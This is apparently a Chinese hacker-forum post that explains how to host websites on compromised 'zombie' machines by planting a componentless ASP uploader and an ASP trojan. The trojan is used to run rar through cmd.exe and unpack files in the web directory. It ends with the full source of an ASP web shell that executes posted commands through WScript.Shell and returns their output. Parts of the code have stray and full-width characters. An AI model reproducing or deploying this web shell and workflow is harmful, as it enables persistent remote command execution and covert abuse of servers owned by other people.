我想大家都有一些开了80端口的肉鸡吧,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉.
　在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和asp木马可以轻松实现.

　　asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%systemroot%\system32\下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,v,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句＜% =server.mappath(".") %＞,"."可以随意改成任何的相对虚拟目录.

　　只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压，不知会不会弹出对话框。

　　--------以下是asp木马的源码,建议在＜html＞后加上＜% =server.mappath(".") %＞------------------------------

＜%@ language=vbscript %＞ ＜% 　dim oscript 　dim oscriptnet 　dim ofilesys, ofile 　dim szcmd, sztempfile 　on error resume next 　＜ 　　' -- create the com objects that we will be using -- ' 　　set oscript = server.createobject("wscript.shell") 　　set oscriptnet = server.createobject("wscript.network") 　　set ofilesys = server.createobject("scripting.filesystemobject") ＜ 　　' -- check for a command that we have posted -- ' 　　szcmd = request.form(".cmd") 　　if (szcmd ＜＞ "") then ＜ 　　　' -- use a poor man's pipe ... a temp file -- ' 　　　sztempfile = "c:\" & ofilesys.gettempname( ) 　　　call oscript.run ("cmd.exe /c " & szcmd & " ＞ " & sztempfile, 0, true) 　　　set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) ＜ 　　end if ＜ %＞ ＜html＞ ＜body＞ 　＜form action="＜%= request.servervariables("url") %＞" method="post"＞ 　　＜input type=text name=".cmd" size=45 value="＜%= szcmd %＞"＞ 　　＜input type=submit value="run"＞ 　＜/form＞ ＜pre＞ ＜ 　＜% 　　if (isobject(ofile)) then 　　　' -- read the output from our command and remove the temp file -- ' 　　　on error resume next 　　　response.write server.htmlencode(ofile.readall) 　　　ofile.close 　　　call ofilesys.deletefile(sztempfile, true) 　　end if 　%＞ ＜/body＞ ＜/html＞ ＞